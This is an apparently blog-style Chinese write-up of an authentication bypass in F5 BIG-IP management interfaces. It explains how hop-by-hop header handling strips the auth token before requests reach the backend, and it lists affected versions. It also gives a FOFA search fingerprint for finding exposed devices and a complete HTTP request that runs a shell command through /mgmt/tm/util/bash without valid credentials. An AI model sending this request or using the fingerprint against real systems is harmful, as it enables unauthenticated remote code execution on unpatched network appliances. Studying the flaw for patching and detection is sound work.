漏洞原理

hop-by-hop 逐跳,当在请求中遇到这些header头,逐跳会进行处理不让其转发至下一跳,比如Connection: close,abc在传输过程中,会把abc会从原始请求中删除,可以利用此特性进行SSRF、绕过鉴权等操作,本次漏洞成因就是Connection: Keep-alive,X-F5-Auth-Token,BIG-IP的鉴权过程发生在frontend,在后续转发到Jetty时会将此header删除,从而绕过鉴权

1
2
3
4
POST /xxx HTTP/1.1
Host: 
Connection: close,abc
abc:

处理后变成

1
2
3
POST /xxx HTTP/1.1
Host: 
Connection: close

影响版本

1
2
3
4
5
6
- BIG-IP versions 16.1.0 to 16.1.2 (Patch released)
- BIG-IP versions 15.1.0 to 15.1.5 (Patch released)
- BIG-IP versions 14.1.0 to 14.1.4 (Patch released)
- BIG-IP versions 13.1.0 to 13.1.4 (Patch released)
- BIG-IP versions 12.1.0 to 12.1.6 (End of Support)
- BIG-IP versions 11.6.1 to 11.6.5 (End of Support)

fofa指纹

title=”BIG-IP®- Redirect”

image-20220510020731124

发送数据包

1
2
3
4
5
6
7
8
9
10
11
12
POST /mgmt/tm/util/bash HTTP/1.1
Host: REDACTED
Content-Length: 45
Connection: Keep-Alive, X-F5-Auth-Token
Cache-Control: max-age=0
X-F5-Auth-Token: vvs
Authorization: Basic YWRtaW46

{
"command":"run",
"utilCmdArgs":"-c id"
}

image-20220510020538066